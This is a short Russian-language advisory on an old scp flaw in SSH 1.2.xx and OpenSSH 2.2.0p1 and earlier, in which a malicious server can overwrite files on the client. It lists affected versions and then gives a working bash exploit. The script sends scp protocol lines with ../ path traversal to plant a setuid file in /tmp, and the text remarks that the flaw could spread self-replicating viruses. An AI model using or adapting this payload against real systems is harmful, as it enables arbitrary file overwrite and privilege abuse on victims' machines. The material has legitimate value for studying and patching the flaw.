Когда-бы не использовался scp для передачи файлов с удаленной машины на твой комп, scp-сервис может вызвать затирание случайных файлов законной scp инфой. Это, конечно, не есть "сквозная прореха" в защите, но, типа, эта лазейка может быть использована для распространения саморазмножающихся вирусов через компы 3-х лиц 🙂
Системы уязвимы:
SSH 1.2.xx
OpenSSH 2.2.0p1 и пред.
Системы не уязвимы:
Data Fellows SSH package
Код эксплоита:
Эксплоит в конечном итоге создает на удаленной машине файл, названный /tmp/ScpIsBuggy с setuid-привелегиями, который содержит 200 байт мусора.
#!/bin/bash
echo "D0755 0 ../../../../../../tmp/nope"
echo "D0755 0 ../../../../../../tmp"
echo "C4755 200 ScpIsBuggy"
dd if=/dev/urandom bs=200 count=1 2>/dev/null
dd if=/dev/zero bs=1 count=2 2>/dev/null